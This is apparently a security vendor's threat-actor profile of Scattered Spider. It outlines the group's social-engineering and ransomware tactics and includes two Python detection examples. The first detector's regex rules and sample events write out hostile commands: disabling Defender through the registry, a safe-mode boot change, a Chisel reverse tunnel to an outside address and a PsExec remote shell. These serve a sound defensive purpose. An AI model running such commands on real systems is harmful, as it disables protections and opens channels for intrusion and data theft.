Scattered Spider
Scattered Spider is a financially motivated threat actor known for its sophisticated use of social engineering, identity abuse, and high-impact ransomware attacks. Active since early 2022, the group has evolved rapidly, targeting a wide range of industries across multiple countries.

The origin of Scattered Spider
Scattered Spider, also tracked as Storm-0875, LUCR-3, Octo Tempest, Roasted 0ktapus, Scatter Swine, and UNC3944, is a prolific eCrime adversary active since early 2022. Believed to operate primarily out of Western countries, Scattered Spider is known for high-impact financial attacks, particularly against high-revenue organizations. Its operations evolved from credential theft and SIM swapping into high-profile ransomware deployments, with extortion as the final objective.
Early campaigns focused on customer relationship management (CRM) and business-process outsourcing (BPO) firms. By April 2023 the group's operational scope had broadened with the adoption of ransomware as its primary monetization tool. Despite the arrest of suspected teenage members by UK and U.S. law enforcement in 2024, the group remains active.
Countries targeted by Scattered Spider
The group targets numerous countries across multiple continents. Notable examples include:
- United States, Canada, and Brazil in the Americas.
- United Kingdom, Germany, Italy, France, and Switzerland in Europe.
- South Korea, Japan, Singapore, India, and Australia in the Asia-Pacific region.
Industries targeted by Scattered Spider
Scattered Spider is notable for the breadth of industries it targets. These include:
- Telecommunications and Technology, particularly in its earlier campaigns.
- Retail, Financial Services, and Consumer Goods, which saw increased targeting as ransomware became central to their operations.
- A wide array of other sectors such as Manufacturing, Hospitality, Legal, Healthcare, Energy, and Cryptocurrency, indicating a non-discriminatory “big game hunting” approach focused on profitability.
Scattered Spider's Victims
While many victims remain unnamed due to the sensitive nature of the incidents, Scattered Spider is confirmed to primarily impact:
- Fortune 500 companies
- High-revenue organizations
- Firms with access to sensitive user data and enterprise-scale infrastructure
Scattered Spider's attack method

Initial Access: achieved through social engineering such as smishing, vishing, and impersonation of IT helpdesks. Operators either pose as the helpdesk to the user, or pose as the user to the helpdesk, to have passwords and MFA factors reset, then log in with the new credentials.

Privilege Escalation: they target accounts that already hold elevated privileges, often IT, security, and C-suite personnel.

Defense Evasion: custom malware (e.g., CS-Paralyzer), reboots into safe mode (where most EDR agents do not load), registry modification, and UEFI bootkits such as BlackLotus are used to disable or bypass EDR/AV tools.

Credential Access: credentials are harvested via phishing kits, Mimikatz, secretsdump.py, DCSync, and memory dumps of credential-holding processes.

Discovery: legitimate administrative tools and the victim's own internal documentation are used to map the environment.

Lateral Movement: RDP, SSH, PsExec, and Azure management commands, exploiting internal trust relationships between systems and identities.

Collection: data is gathered from SharePoint, Google Workspace (G Suite), internal file shares, and email repositories.

Command and Control: deployment of malware or commercial RMM tools such as AnyDesk, ScreenConnect, and TightVNC.

Exfiltration: tools such as Chisel and Plink tunnel data to remote servers or Telegram channels.

Impact: data is encrypted with ransomware such as ALPHV/BlackCat, DragonForce, Qilin, and RansomHub, often paired with the threat to leak stolen data (double extortion).

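The endpoint side of the chain above (safe-mode reboots, registry tampering, PsExec, Chisel/Plink tunnels, operator-dropped RMM binaries) leaves command lines that can be matched directly. The following is an added example, not Vectra AI's detection logic: a handful of regex rules run over process-creation events. The events are constructed to resemble Sysmon Event ID 1 fields, and the command shapes and binary names the rules look for are the author's assumptions, not indicators from the page.

```python
"""Command-line heuristics for the endpoint stages listed above.

Added example, not Vectra AI's detection logic. The events are constructed to
resemble Sysmon Event ID 1 (process creation) fields; the command shapes and
binary names the regexes look for are the author's assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    user: str
    image: str          # full path of the new process
    command_line: str


# (finding, ATT&CK tactic as used on this page, regex over the command line)
CMDLINE_RULES = [
    ("bcdedit configures safe-mode boot", "Defense Evasion",
     re.compile(r"bcdedit(\.exe)?\s+/set\b.*\bsafeboot\b", re.I)),
    ("registry edit disables Defender or registers a service for safe mode", "Defense Evasion",
     re.compile(r"reg(\.exe)?\s+add\b.*(disableantispyware|disablerealtimemonitoring"
                r"|\\safeboot\\(minimal|network)\\)", re.I)),
    # Flags stay case-sensitive: plink -R/-L/-N are forwards, lowercase -l is a login name.
    ("chisel/plink reverse tunnel", "Exfiltration",
     re.compile(r"(?i:(^|[\\/\s])(chisel|plink)(\.exe)?\b).*(\bclient\b|\s-[RLN]\b)")),
    ("PsExec against a remote host", "Lateral Movement",
     re.compile(r"psexec(64)?(\.exe)?\b.*\\\\\S+", re.I)),
]

# RMM binaries are legitimate in many estates, so they are only flagged when the
# image runs from a user-writable location, i.e. dropped by the operator rather
# than installed by IT. Binary names are assumed.
RMM_IMAGE = re.compile(r"(anydesk|screenconnect|tvnserver|tightvnc)", re.I)
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads|desktop)\\|\\programdata\\|\\windows\\temp\\", re.I)


def evaluate(ev: ProcEvent) -> list[tuple[str, str]]:
    """Return (finding, tactic) pairs for one process-creation event."""
    hits = [(name, tactic) for name, tactic, rx in CMDLINE_RULES
            if rx.search(ev.command_line)]
    if RMM_IMAGE.search(ev.image) and USER_WRITABLE.search(ev.image):
        hits.append(("RMM tool launched from user-writable path", "Command and Control"))
    return hits


def scan(events: list[ProcEvent]) -> list[dict]:
    """Flatten findings across a batch of events, keeping host/user context."""
    return [{"host": ev.host, "user": ev.user, "finding": name, "tactic": tactic}
            for ev in events for name, tactic in evaluate(ev)]


# Constructed sample: five operator actions on WS-017 and one benign plink use.
SAMPLE_EVENTS = [
    ProcEvent("WS-017", "CORP\\jdoe", r"C:\Windows\System32\bcdedit.exe",
              r"bcdedit /set {default} safeboot network"),
    ProcEvent("WS-017", "CORP\\jdoe", r"C:\Windows\System32\reg.exe",
              r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'),
    ProcEvent("WS-017", "CORP\\jdoe", r"C:\Users\jdoe\AppData\Local\Temp\chisel.exe",
              r"chisel.exe client 203.0.113.10:8080 R:socks"),
    ProcEvent("WS-017", "CORP\\jdoe", r"C:\Users\jdoe\Downloads\AnyDesk.exe",
              r"AnyDesk.exe --silent"),
    ProcEvent("SRV-DC1", "CORP\\svc_backup", r"C:\Program Files\Backup\plink.exe",
              r"plink.exe -l backup -pw x backup.corp.local"),   # -l is a login name, not a forward
    ProcEvent("WS-017", "CORP\\jdoe", r"C:\Tools\PsExec64.exe",
              r"PsExec64.exe -accepteula \\SRV-FS02 -s cmd.exe"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The value is in the grouping, not any single rule: a safe-mode boot change, a Defender registry edit, a tunnel client from a temp directory and an RMM installer from Downloads on the same host within minutes is the defense-evasion-to-C2 sequence described above, whereas any one of them alone is routine in many environments. The RMM rule deliberately keys on where the binary runs from rather than its name, because the same AnyDesk or ScreenConnect build may be sanctioned when installed under Program Files by IT.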
TTPs used by Scattered Spider
How to Detect Scattered Spider with Vectra AI
List of the Detections available in the Vectra AI Platform that would indicate a ransomware attack.
FAQs
What makes Scattered Spider different from other threat groups?
They uniquely blend social engineering, SIM swapping, and legitimate tools to bypass security mechanisms without needing zero-day exploits.
How do Scattered Spider gain initial access?
Primarily through smishing, vishing, and phishing to harvest credentials and persuade helpdesk agents to reset MFA/authentication.
What kind of malware or tools do Scattered Spider use?
They use a mix of commercial RMM tools (e.g., AnyDesk), affiliate ransomware (e.g., ALPHV/BlackCat, Qilin), and custom utilities (e.g., CS-Paralyzer, Pumpy).
Are Scattered Spider's operations fully automated?
No. They use automated phishing kits, but most of their post-access operations rely on manual operator actions.
Can traditional MFA protect against Scattered Spider?
Not reliably. They defeat SMS- and push-based MFA through SIM swapping and MFA fatigue (push bombing), and bypass it altogether by abusing self-service password reset (SSPR) and helpdesk reset procedures to enroll their own authentication methods.
What detection techniques can help?
Deploying a robust Network Detection and Response (NDR) solution is critical to identifying and disrupting Scattered Spider's activity. NDR can detect lateral movement, C2 communications, and unusual data-exfiltration patterns across east-west and north-south traffic, even when adversaries use legitimate tools like RDP or PsExec, or encrypted tunnels (e.g., Chisel, Plink): the tunnel endpoints, connection timing, and transfer volumes remain observable even though the payload does not.
What are signs of compromise (IoCs)?
Uploads to file-sharing services (e.g., file.io), RMM connections from tools or hosts not sanctioned by IT, and helpdesk-initiated password or MFA resets that the account owner did not request, especially when followed by a sign-in from a new device or location, are common indicators.
How do Scattered Spider maintain persistence?
Via bootkits, scheduled tasks, enrollment of attacker-controlled MFA methods on compromised accounts, and disabled security tooling.
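The helpdesk-initiated resets and attacker-enrolled MFA methods in the answers above can be caught by correlating the reset with what the account does next. The following is an added example and not Vectra AI's code: the audit and sign-in records are constructed in a simplified Microsoft Entra ID shape, and the field and operation names are the author's assumptions about that schema rather than verified log formats.

```python
"""Correlating helpdesk-driven resets with what follows them.

Added example; not Vectra AI's code. Records are constructed in a simplified
Microsoft Entra ID shape (field and operation names are the author's
assumptions). Rule: a helpdesk actor resets a user's password or authentication
methods, and within WINDOW that user either registers a new authentication
method or signs in from an IP or country absent from their baseline.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(hours=2)

# Assumed audit-log operation names for helpdesk resets and user MFA enrollment.
RESET_OPS = {"Reset user password", "Admin deleted security info", "Admin updated security info"}
ENROLL_OPS = {"User registered security info"}


def correlate(audit: list[dict], signins: list[dict], baseline: dict) -> list[dict]:
    """audit: {"ts","op","actor","target"}; signins: {"ts","user","ip","country","result"};
    baseline: {user: {"ips": set, "countries": set}} built from the prior 30 days."""
    ts = lambda r: datetime.fromisoformat(r["ts"])
    enrolls, logins = defaultdict(list), defaultdict(list)
    for e in audit:
        if e["op"] in ENROLL_OPS:
            enrolls[e["target"]].append(ts(e))
    for s in signins:
        if s["result"] == "success":
            logins[s["user"]].append(s)

    alerts, last_alert = [], {}
    for e in sorted((e for e in audit if e["op"] in RESET_OPS), key=ts):
        user, t0 = e["target"], ts(e)
        # A password reset and a method wipe minutes apart are one helpdesk call;
        # do not raise a second alert for the same call.
        if user in last_alert and t0 - last_alert[user] <= WINDOW:
            continue
        in_window = lambda t: t0 <= t <= t0 + WINDOW
        reasons = []
        if any(in_window(t) for t in enrolls[user]):
            reasons.append("new authentication method registered after helpdesk reset")
        known = baseline.get(user, {"ips": set(), "countries": set()})
        for s in logins[user]:
            if in_window(ts(s)) and (s["ip"] not in known["ips"] or s["country"] not in known["countries"]):
                reasons.append(f"sign-in from unseen {s['country']} {s['ip']} after helpdesk reset")
        if reasons:
            last_alert[user] = t0
            alerts.append({"user": user, "helpdesk_actor": e["actor"],
                           "reset_at": e["ts"], "reasons": reasons})
    return alerts


# Constructed sample: one social-engineered reset (alice) and one routine reset (bob).
SAMPLE_BASELINE = {
    "alice@corp.example": {"ips": {"198.51.100.7"}, "countries": {"US"}},
    "bob@corp.example": {"ips": {"198.51.100.9"}, "countries": {"US"}},
}
SAMPLE_AUDIT = [
    {"ts": "2025-03-04T09:00:00", "op": "Reset user password",
     "actor": "helpdesk1@corp.example", "target": "alice@corp.example"},
    {"ts": "2025-03-04T09:04:00", "op": "Admin deleted security info",
     "actor": "helpdesk1@corp.example", "target": "alice@corp.example"},
    {"ts": "2025-03-04T09:11:00", "op": "User registered security info",
     "actor": "alice@corp.example", "target": "alice@corp.example"},
    {"ts": "2025-03-04T14:00:00", "op": "Reset user password",
     "actor": "helpdesk1@corp.example", "target": "bob@corp.example"},
]
SAMPLE_SIGNINS = [
    {"ts": "2025-03-04T09:14:00", "user": "alice@corp.example",
     "ip": "203.0.113.55", "country": "NL", "result": "success"},
    {"ts": "2025-03-04T14:09:00", "user": "bob@corp.example",
     "ip": "198.51.100.9", "country": "US", "result": "success"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_AUDIT, SAMPLE_SIGNINS, SAMPLE_BASELINE):
        print(alert)
```

Bob's reset produces nothing because his next sign-in comes from an address already in his baseline, which is what a legitimate lockout looks like; Alice's reset is followed by a new authentication method and a sign-in from an unseen country, which is the helpdesk-impersonation pattern. The helpdesk actor is carried in the alert deliberately, since the same agent appearing on several such alerts points at a targeted (or compromised) helpdesk account rather than isolated user mistakes.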
Do Scattered Spider use ransomware every time?
Not always. In some cases, they aim for data theft and extortion without ransomware deployment.